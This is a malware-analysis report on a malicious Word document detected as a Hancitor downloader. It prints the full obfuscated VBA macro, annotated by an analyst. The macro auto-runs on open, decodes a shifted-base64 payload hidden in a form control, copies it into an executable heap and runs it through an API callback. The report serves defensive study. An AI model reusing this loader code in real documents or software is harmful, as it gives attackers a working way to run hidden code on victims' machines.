Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 227373bc40584552…

MALICIOUS

Office (OLE)

217.5 KB Created: 2016-10-11 11:21:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: 0605c9b96be21fe8d1173966a09cea73 SHA-1: 6e151b094f792f1e5e56595544334b7f45dc1f67 SHA-256: 227373bc4058455286d4136f5f8302c847873f2fd4436896ee158b1d47bd8460
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the macros.bas script. The Document_Open macro is present, suggesting it executes upon opening. While the script is heavily obfuscated, the presence of a downloader macro and the ClamAV detection (Doc.Downloader.Hancitor-7051699-0) strongly suggest its purpose is to download and execute a secondary payload. The benign URLs extracted do not provide further IOCs.

Heuristics 4

  • ClamAV: Doc.Downloader.Hancitor-7051699-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Hancitor-7051699-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim dallas As Integer
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://www.iec.ch — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13274 bytes
SHA-256: cc5d3efb6fcbed5ceaf90a68ccca0c46eca9e87e8d548cbf72de315ae171edce
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module-level variables shared by the routines below. None of them feeds an
' API call: borrower, asclepiadaceous, anode and appeach are only ever
' assigned (or assigned to themselves), and aditi/detrusion take part in
' arithmetic whose result is discarded. They exist as filler to pad the code.
Dim borrower
Dim asclepiadaceous
Dim anode
Dim aditi
Dim detrusion As Long
Dim appeach As String

' Decoy routine: writes a fixed string into the primary header of the first
' section. Nothing in the extracted code calls it. Note that the declared
' local `nText` is never used; the value is assigned to the undeclared
' `nHeaderText` (no Option Explicit in this module), which is what the
' header text reads.
Sub HeaderObjectSetup()
  Dim nText As String
  nHeaderText = "Nije presa"
  With ActiveDocument.Sections(1)
    .Headers(wdHeaderFooterPrimary).Range.Text = nHeaderText
  End With
End Sub

' Auto-run entry point: Word executes this when the document is opened
' (the OLE_VBA_DOCOPEN heuristic above matched this line). The only statement
' that matters is the bare call to `ferial`; the surrounding assignments are
' filler, and the If test (99 + 60 < 29) is always False, so only the Else
' branch ever runs.
Private Sub Document_Open()
Dim dallas As Integer
Dim mortal As Long
millwheel = "exclude"
aneurysm = LCase$("DISq") & UCase$("UaLIfiCaTIon")
' Real work happens here (see ferial below).
ferial
chancroid = 99
legato = 60
If chancroid + legato < 29 Then
chancroid = UCase$("LE") & UCase$("EcHeS")
aditi = aditi * 4
stupefying = UCase$("ch") & "emilu" & "minescence"
Else
anode = "operate"
legato = 40
End If
End Sub
' Main routine. Data flow that matters, everything else being filler:
'   1. pointsman  <- encoded text stored in a form control's ControlTipText
'   2. distensible <- missouri.debasement(pointsman)   (base64-style decode)
'   3. danaea     <- HeapCreate(0x40000, ...)           (executable heap)
'   4. cable      <- RtlAllocateHeap(danaea, 0, 3299)  (via lovrinac)
'   5. gaucho cable, cursorily                          (copy decoded bytes in)
'   6. EnumUILanguagesW(cable + adeptness, 0, docpath)  (callback into buffer)
' The alias-to-API mapping for the Declare'd names is in module missouri.
Sub ferial()
Dim illboding As Integer
Dim streptopelia As Variant
' The encoded payload lives in the ControlTipText property of control
' `unilateralist` on `euphonium` (presumably a UserForm; only its attribute
' block appears in this preview).
pointsman = euphonium.unilateralist.ControlTipText
' Decode; see missouri.debasement for the algorithm.
distensible = missouri.debasement(pointsman)
cerebral = 2
While cerebral < 5
cerebral = cerebral + 1
borrower = "gentry"
Wend

punt = "pellucidness"
parisienne = "confabulation"
#If Win64 Then
Dim overblown As Byte
' On Win64 `preferment` is the one-field Type dolichocephalic (header As
' LongPtr) from module missouri; on Win32 it is a plain 0. It is only used
' as the two size arguments of HeapCreate below.
Dim preferment As dolichocephalic
Dim cable As LongPtr
preferment.header = 0
Dim cockfighting As String
#Else
Dim egotism As Variant
preferment = 0
Dim tribuneship As Variant
Dim cable As Long
#End If
pranks = 223 - 223
garbage = "arma"
indeterminably = 4096
refiner = 87
amberboa = 93
' 87 + 93 < 39 is always False: dead branch, filler only.
If refiner + amberboa < 39 Then
refiner = Left("bibenolin", 2) & Right$("pathlessrthright", 8)
detrusion = detrusion And 153
grantinaid = Left("crinovelette", 3) & Mid("cephalopterusminalbandy", 14, 5) & "ity"
Else
anode = "brae"
amberboa = 62
End If

' 167 + 261977 = 262144 = 0x40000, which is the value of
' HEAP_CREATE_ENABLE_EXECUTE: the heap created next is executable.
Address = 167 + 261977
' africanamerican = kernel32!HeapCreate (alias declared in module missouri).
danaea = africanamerican(Address, preferment, preferment)
' lovrinac -> ntdll!RtlAllocateHeap: a 3299-byte block inside that heap.
cable = lovrinac(danaea)
ahariolation = "incircumspect"
highlow = "har" & LCase$("mlESsly")
Dim demonstrable As String
whoosh = "qs"
' Full path of this document (ThisDocument.Path & "/" & ThisDocument.Name).
demonstrable = sensitiveness
slaughterhouse = 7
While slaughterhouse < 11
slaughterhouse = slaughterhouse + 1
asclepiadaceous = "tobbaconist"
Wend

' Decoded bytes, now held in a Variant so gaucho can take its data pointer.
cursorily = distensible
onepan = Mid("disorderedchcatadupe", 11, 2) & Mid("adulteressompinonvolatile", 11, 4) & LCase$("ng")
marquetry = "butane"
' Copies 3299 decoded bytes into the heap block (see gaucho).
gaucho cable, cursorily
canaanitic = UCase$("pRo") & Mid("pistoleercrustcrescendo", 10, 5) & Left("esbandurria", 2)
gryllidae = "curvation"
#If Win64 Then
Dim degenerateness As Long
davus = "confirmed"
tetrachloride = "metamorphose"
' Offset into the heap block used as the callback address: 576 on Win64 ...
adeptness = 47 + 529
#ElseIf (Win32) Then
bodywork = "beat"
mere = "acuteness"
unpermed = 7 + 499
' ... and 506 + 1698 = 2204 on Win32.
adeptness = unpermed + 1698

#End If
Dim lugsail As Byte
Dim forage As Integer
Dim loquaciousness As Long
loquaciousness = 0
Dim midipyrenees As Long
' Address of the decoded payload's entry point: block base + fixed offset.
midipyrenees = cable + adeptness
' abysmal = kernel32!EnumUILanguagesW(lpEnumFunc, flags, lParam). Windows
' invokes lpEnumFunc as a callback, and here it points into the heap block
' just filled with the decoded bytes, so this call is what transfers control
' to the payload. flags is 0; the document path goes in as lParam
' (presumably read by the payload — cannot be confirmed from this listing).
bey = abysmal(midipyrenees, loquaciousness, demonstrable)
cottus = 82
hebetude = 57
' 82 + 57 < 39 is always False: dead branch, filler only.
If cottus + hebetude < 39 Then
cottus = Mid("ninevehautarrowhead", 8, 3) & Left("ochthonescarolinian", 9)
borrower = "paces"
swim = Left("assopisthognathous", 3) & "evera" & Left("techemistry", 2)
Else
appeach = appeach
hebetude = 51
End If

End Sub

' Wraps ntdll!RtlAllocateHeap (alias `eldorado` in module missouri):
' allocates a 3299-byte block, flags 0, from heap handle `pam`.
' 3299 is also the byte count gaucho later copies into the block.
Function lovrinac(pam)
lovrinac = eldorado(pam, 0, 3299)
End Function


' Returns the full path of the open document: ThisDocument.Path & "/" &
' ThisDocument.Name. Called from ferial, where the result is passed as
' lParam to EnumUILanguagesW. The If block is filler (96 + 55 < 9 is
' always False).
Function sensitiveness()
Dim scoot As Variant
Dim salebrous As Byte
pholas = 96
receiving = 55
If pholas + receiving < 9 Then
pholas = Right$("undersizeac", 2) & "cord"
anode = anode
shirking = Right$("bitternbl", 2) & LCase$("EBbe") & Left("dflatworm", 1)
Else
detrusion = detrusion And 160
receiving = 49
End If

hamburg = ThisDocument.Path
sensitiveness = hamburg & "/" & ThisDocument.Name
End Function
' Copies the decoded payload into the executable heap block.
'   urocyon      - block address returned by lovrinac (RtlAllocateHeap)
'   altitudinous - Variant holding the decoded String from debasement
' `crossness` is ntdll!RtlMoveMemory (module missouri). No return value is
' ever set; the function is called as a statement from ferial.
Function gaucho(urocyon, altitudinous)
Dim hock As Integer
Dim fleeting As Long
detrusion = aditi And 249
Dim bifurcated As String
Dim sporaceous As Long
Dim batta As Byte
Dim brightness As Variant
Dim bellicose As Long
' RtlMoveMemory(&sporaceous, VarPtr(altitudinous) + 8, 4): reads the 4 bytes
' at offset 8 of the VARIANT, i.e. its data union — for a String, the pointer
' to the character buffer. sporaceous is a 4-byte Long, so only the low
' 32 bits of the pointer are captured (NOTE(review): on Win64 this truncates
' the pointer; presumably it relies on the buffer sitting below 4 GB).
crossness sporaceous, ByVal VarPtr(altitudinous) + 8, 4
anode = "smiles"
bellicose = urocyon
' Filler loop; both echinodermata assignments are discarded.
For korean = 49 To 65
cerulean = 65
detrusion = aditi \ 398
echinodermata = Mid("mylodoncoderogative", 8, 2) & Left("unterintelligencephilister", 17)
echinodermata = Mid("aborigineorbursera", 10, 2) & Mid("mitadganitideway", 6, 4) & Mid("visasmconstitutionality", 5, 2)
Next korean

' RtlMoveMemory(urocyon, sporaceous, 3299): 3299 bytes from the decoded
' string's buffer into the heap block — the same size lovrinac allocated.
crossness ByVal bellicose, ByVal sporaceous, 3299
aditi = aditi - 279
End Function

Attribute VB_Name = "missouri"
' Module missouri: Win32 API imports under meaningless alias names, plus the
' decoder (debasement) and its arithmetic helpers. The interleaved comment
' lines are song-lyric filler, not documentation. Of the imports below, only
' four are used by the extracted code:
'   africanamerican -> kernel32!HeapCreate        (ferial)
'   eldorado        -> ntdll!RtlAllocateHeap      (lovrinac)
'   crossness       -> ntdll!RtlMoveMemory        (gaucho)
'   abysmal         -> kernel32!EnumUILanguagesW  (ferial; callback = payload)
' GetDC, GetModuleHandle, TlsAlloc, RemoveDirectoryA and EndDialog are
' declared but never called — decoys. The Win64 branch uses PtrSafe/LongPtr
' declarations, the Win32 branch plain Long ones.
'I can't deal with your lies
'Life has always been a problem
#If Win64 Then
'And take my time
'Nothing is real and dies in the lies
' One-field wrapper Type; ferial passes an instance of it as both size
' arguments of HeapCreate on Win64.
Public Type dolichocephalic
'I don't fit in
'Life has always been a problem
header As LongPtr
'Life is gone
'And take my time
End Type
'I won't deal with your lies
'I lost my mind
Public Declare PtrSafe Function adventitious Lib "user32" Alias "GetDC" (ByVal carnal As LongPtr) As LongPtr
'Let it all go and in time you will find
'Can't you see?
Public Declare PtrSafe Function orzo Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'People have said
'I don't fit in
Public Declare PtrSafe Function hyperborean Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'People have said
'I can't escape
Public Declare PtrSafe Function hinan Lib "kernel32" Alias "RemoveDirectoryA" (callithricidae As LongPtr)
'I wish I could watch you drown and die
'I wish I could watch you drown and die
' HeapCreate(flOptions, dwInitialSize, dwMaximumSize). NOTE(review): the two
' size parameters are ByRef Type arguments here, so the API receives the
' address of the Type rather than its value (0).
Public  Declare PtrSafe Function africanamerican Lib "kernel32" Alias "HeapCreate" (ByVal empires As LongPtr,incinerate As dolichocephalic, nonsubsistence As dolichocephalic) As LongPtr
'Numb me 'til I won't feel pain again
'Life is gone
Public Declare PtrSafe Function egganddart Lib "user32" Alias "EndDialog" (ByVal attenuated As LongPtr,nResult As LongPtr) As LongPtr
'I have no one
'Life has always been a problem
' RtlAllocateHeap(HeapHandle, Flags, Size); called by lovrinac with size 3299.
Public  Declare PtrSafe Function eldorado Lib "ntdll" Alias "RtlAllocateHeap" (ByVal profluence As LongPtr, ByVal taylor As  LongPtr, ByVal befogged As LongPtr) As LongPtr
'Let it all go and in time you will find
'The pressure seems to get me down
' EnumUILanguagesW(lpEnumFunc, dwFlags, lParam); the first argument is a
' callback pointer, which ferial sets to an address inside the heap block.
Public  Declare PtrSafe Function abysmal Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'Fuck all the shit that you hold in your mind
'Life has always been a problem
' RtlMoveMemory(Destination, Source, Length); used twice in gaucho.
Public  Declare PtrSafe Sub crossness Lib "ntdll" Alias "RtlMoveMemory" (checquers As Any, palliament As Any, ByVal dignitatem As LongPtr)
'Life has always been a problem
'And take my time

'Can't you see
'And take my time
#Else
'Poisons me with time
'I wish I could watch you drown and die
' 32-bit counterparts of the four imports above (same aliases, Long instead
' of LongPtr); the remaining declarations in this branch are unused decoys.
Public Declare Sub crossness Lib "ntdll" Alias "RtlMoveMemory" (analeptic As Any, buna As Any, ByVal acknowledgeable As Long)
'I wish I could watch you drown and die
'It's like a needle in my spine
Public Declare Function blase Lib "user32" Alias "GetDC" (arctotis As Long) As Long
'And take my time
'I'm not okay
Public Declare Function eldorado Lib "ntdll" Alias "RtlAllocateHeap" (ByVal acrocarpous As Long, ByVal astonished As Long, ByVal murmur As Long) As Long
'I'm not okay
'I wish I could watch you drown and die
Public Declare Function abysmal Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal ricin As Any, lParam As Any) As Long
'It's like a needle in my spine
'Life has always been a problem
Public Declare Function preservative Lib "user32" Alias "EndDialog" (ByVal lancinate As Long, determent As Long) As Long
'I have no one
'It stings inside
Public Declare Function ascomycota Lib "kernel32" Alias "RemoveDirectoryA" (nepotist As Long)
'I don't fit in
'Life has always been a problem
Public Declare Function thrill Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'I don't fit in
'Fuck all the shit that you hold in your mind
Public Declare Function africanamerican Lib "kernel32" Alias "HeapCreate" (ByVal pundit As Long, ByVal transportation As Long, ByVal unenslaved As Long) As Long
'I don't fit in
'Poisons me with time
Public Declare Function anointment Lib "kernel32" Alias "TlsAlloc" () As Long
'I have no one
'Life is gone

'I wish I could watch you drown and die
'I don't fit in
#End If
'Poisons me with time
'Life is gone
' Multiplication wrapper (akin * jordan). Used by debasement to build the
' 64^n weight tables; wrapping the operator only serves to obscure the math.
Function rusticate(akin, jordan)
rusticate = akin * jordan
End Function
' Integer-division wrapper (discreteness \ borated). Used by debasement to
' shift a masked 24-bit value down to a single byte.
Function lamaist(discreteness, borated)
lamaist = discreteness \ borated
End Function
' Bitwise-And wrapper (preparedness And knothole). Used by debasement to mask
' one byte out of a 24-bit value.
Function diadophis(preparedness, knothole)
diadophis = preparedness And knothole
End Function


' Decoy routine: restyles every table in the active document by its current
' style name. Nothing in the extracted code calls it; it reads like a
' legitimate macro pasted in to make the project look benign.
Sub FormatTables()
Dim oTabl As Table
For Each oTabl In ActiveDocument.Tables
    Select Case oTabl.Style
        Case "Light Shading - Accent 4"
            oTabl.AutoFitBehavior (wdAutoFitFixed)
            oTabl.Rows.Alignment = wdAlignRowCenter
            oTabl.Columns.PreferredWidth = InchesToPoints(0.6)
        Case "Medium List 2 - Accent 4"
            oTabl.AutoFitBehavior (wdAutoFitWindow)
            oTabl.Rows.Alignment = wdAlignRowLeft
        Case Else
            oTabl.Style = "Medium List 1 - Accent 4"
        End Select
Next oTabl
End Sub

' Decodes the text stored in the form control's ControlTipText.
' The algorithm is standard base64 (4 characters -> 3 bytes, alphabet
' A-Z a-z 0-9 + /) with one twist: 2 is added to every input character code
' before the table lookup, i.e. the stored text is base64 with each character
' shifted down by 2. rusticate / lamaist / diadophis are plain *, \ and And.
' Always consumes exactly 4288 characters and yields 3216 bytes, which are
' returned as a String assigned from a Byte array (raw bytes preserved).
' Everything not mentioned in the comments below is filler.
Function debasement(rembrandtesque) As String
Dim dislocate As Integer
Dim ampullar As Long
Dim london(63) As Long
detrusion = aditi \ 433

Dim leap(63) As Long
Dim gle As Long

Dim cataplasm As Long
Dim arbitrariness As String
appeach = appeach

Dim discumbency As Long
Dim fertilized As Long
Dim volva As Variant

Dim misology As Long

Dim merchant() As Byte
Dim catharsis(255) As Byte
Dim admiral() As Byte
Dim arrogantly(63) As Long
triskaidekaphobia = 512 - 449
electrotherapist = 4032
Dim refulgence As Variant

navicular = 258048
' Weights of the four 6-bit digits: 64 (extispicy), 4096 (icebox) and
' 262144 (peasant, = 210 + 261934) for positions 2, 1 and 0; position 3 is
' added with weight 1.
extispicy = 120 - 56
lightsomeness = 256
icebox = 4096
' Masks/divisors for splitting the 24-bit group into bytes:
' eg = 65536 (0x10000), crystallization = 65280 (0xFF00).
eg = 337 + 65199
crystallization = 77 + 65203
hierarchy = 16515072
Dim ninny As Long

' thoth = 255 (0xFF); peasant = 262144 (64^3).
thoth = 149 + 106
peasant = 210 + 261934
Dim ecce As String

' sunny = 0xFF0000.
sunny = 16711680
Dim diagnosis As Long
Dim eon() As Byte
' Input buffer: 4288 bytes, filled from the first 4288 characters of the
' input regardless of its real length. Mid past the end yields "" and Asc("")
' raises a runtime error, so the stored text is presumably at least this long.
ReDim eon(4287)
haggardly = 61 + 4227
For i = 1 To haggardly
albuminuric = Mid(rembrandtesque, i, 1)
antagonizing = (Asc(albuminuric))
maxillaria = "patefaction"
vulnerable = "anarchistic"
eon(i - 1) = antagonizing
Next
Dim canonize As Byte
For cedarn = 27 To 56
inopioe = 56
borrower = "mortuis"
mummy = UCase$("Sa") & Right$("puebloguntum", 6)
mummy = Right$("selenicereusbo", 2) & Right$("redactionttes", 4)
Next cedarn

penmen = UBound(eon)
extension = 35
' De-obfuscation step: every stored character is 2 below the real base64
' character (a Byte overflow would raise here for codes above 253).
For metamere = 0 To penmen
eon(metamere) = eon(metamere) + 2
Next metamere
custacean = 10
While custacean < 14
gemmation = Right$("abranchiatepa", 2) & Left("ternschonheit", 4) & LCase$("AlisM")
myotonia = "backgammon"
custacean = custacean + 1
detrusion = aditi * 1
Wend

dislocate = 0
anime = 122
blank = 377 - 122
' Reverse base64 table, indexed by character code 0..255:
' 'A'-'Z' -> 0..25, 'a'-'z' -> 26..51, '0'-'9' -> 52..61, '+' -> 62, '/' -> 63.
For ampullar = 0 To blank
Select Case ampullar
Case 65 To 90
catharsis(ampullar) = ampullar - 65
Case 97 To anime
catharsis(ampullar) = ampullar - 71
Case 48 To 57
catharsis(ampullar) = ampullar + 4
Case 43
catharsis(ampullar) = 62
Case 47
catharsis(ampullar) = 63
End Select
Next ampullar
' Precomputed digit * weight tables: arrogantly = i*64, london = i*4096,
' leap = i*262144.
For ampullar = 0 To 63
arrogantly(ampullar) = rusticate(ampullar, extispicy)
london(ampullar) = rusticate(ampullar, icebox)
leap(ampullar) = rusticate(ampullar, peasant)
Next ampullar
liriope = 7
While liriope < 11
snapshot = "profluence"
costerman = "galantuomo"
liriope = liriope + 1
appeach = "alienum"
Wend

admiral = eon
alcoran = 4
' Output buffer: (4288 \ 4) * 3 = 3216 bytes.
ReDim merchant((((UBound(admiral) + 1) \ alcoran) * 3) - 1)
whilst = 93
scholarship = 98
' 93 + 98 < 27 is always False: dead branch.
If whilst + scholarship < 27 Then
whilst = Left("beoutstation", 2) & Left("smearhincodontidae", 4) & LCase$("r")
detrusion = aditi * 1
enchymatous = LCase$("mO") & Right$("biotiticnste", 4) & Right$("bernr", 1)
Else
detrusion = detrusion \ 127
scholarship = 39
End If

missay = 3
asclepiadaceous = asclepiadaceous

detrusion = detrusion And 172

' Step 4 through the input: each group of four characters becomes one
' 24-bit value (digits weighted 64^3, 64^2, 64, 1) ...
idolatry = missay + 1
collectively = 2
For fertilized = 0 To UBound(admiral) Step idolatry
infamy = admiral(fertilized)
cataplasm = leap(catharsis(infamy)) _
 + london(catharsis(admiral(fertilized + 1))) + arrogantly(catharsis(admiral(fertilized + 2))) + catharsis(admiral(fertilized + missay))
' ... split into three bytes: (v And 0xFF0000) \ 0x10000,
' (v And 0xFF00) \ 0x100, v And 0xFF.
ampullar = diadophis(cataplasm, sunny)
merchant(discumbency) = lamaist(ampullar, eg)
ampullar = diadophis(cataplasm, crystallization)
merchant(discumbency + 1) = lamaist(ampullar, lightsomeness)
merchant(discumbency + collectively) = diadophis(cataplasm, thoth)
discumbency = discumbency + collectively + 1
Next fertilized
' Byte array -> String: the bytes are copied into the string buffer as-is.
debasement = merchant
End Function



' Attribute block of module `euphonium`. The GUID pair in VB_Base marks it as
' a form/class module (presumably a UserForm). ferial reads the encoded
' payload from `euphonium.unilateralist.ControlTipText`; only the attribute
' lines of this module appear in the preview, so the control definition and
' the encoded text itself are not visible here.
Attribute VB_Name = "euphonium"
Attribute VB_Base = "0{533F6937-932E-4B77-A83F-A72CE37C5C6E}{E3A17BBD-500D-45A9-8407-44B13A27DD85}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Attribute block of a second form/class module, `disconsolateness`. Nothing
' in the extracted code references it; only its attribute lines are present
' in the preview.
Attribute VB_Name = "disconsolateness"
Attribute VB_Base = "0{19550297-D923-4E9F-A466-DDFCF23686F2}{E9A5762E-E028-489B-B0FE-743DA621682B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False